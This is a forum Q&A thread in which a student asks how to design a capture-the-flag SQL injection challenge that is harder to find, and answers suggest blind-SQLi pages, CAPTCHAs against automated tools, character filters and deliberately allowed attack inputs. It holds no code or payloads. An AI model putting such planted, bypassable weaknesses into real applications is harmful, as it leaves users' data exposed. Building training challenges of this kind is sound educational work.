I'm doing a CTF application for my final year project. I wanted to craft a SQL injection flag but I don't wish that they can simply found out the SQLi vulnerability by injecting ' . Hence, is there way to make SQL injection harder but not impossible using PHP?

What exactly do you want to achieve? I can't imagine what you need when saying harder and impossible...
–
AkamApr 23 '13 at 11:57

Pretty much any SQL injection exercise can be both fun and educational, if you're required to determine something else first with another SQL injection, before winning the flag. This something else can be the data structure of same, or even other tables that are unknown but required for the final SQL injection. Or it could be getting data located in another record first, moving the record cursor up and down with previous injections. Or injecting new fields, or bogus records that would trigger stored procedures that aren't sanitized,... Options are only limited by your imagination really.
–
TildalWaveApr 23 '13 at 12:08

3 Answers
3

Blind SQL injection is probably one of the harder techniques, in that it requires more work. You could make a page that doesn't display any output based on the query, but shows error messages when a query is malformed. The attacker would then be forced to use blind SQLi techniques to attack it.

Of course, an automated tool would break this immediately, since it could automate the entire injection. One interesting way around that would be to have some kind of super-simple image CAPTCHA (no distortion, just a plain image) that the attacker must solve in order to send a query. This would either force them to do it manually, or make them look into OCR techniques.

My first thought is to limit what characters or regex patterns you look for. You could limit the use of only certain strings within the user input that would allow for attacks but would complicate what kind of attacks would work.

I'd say the easiest way to come up with something like this is probably to think of a particular attack you want someone to arrive at and then work backwards. Try to design protection to block everything other than the attack you wish them to perform. It could even be as simple as making it SQL Injection proof but then specifically allowing the desired attack input, though that might be a little too tricky depending on what you are looking for.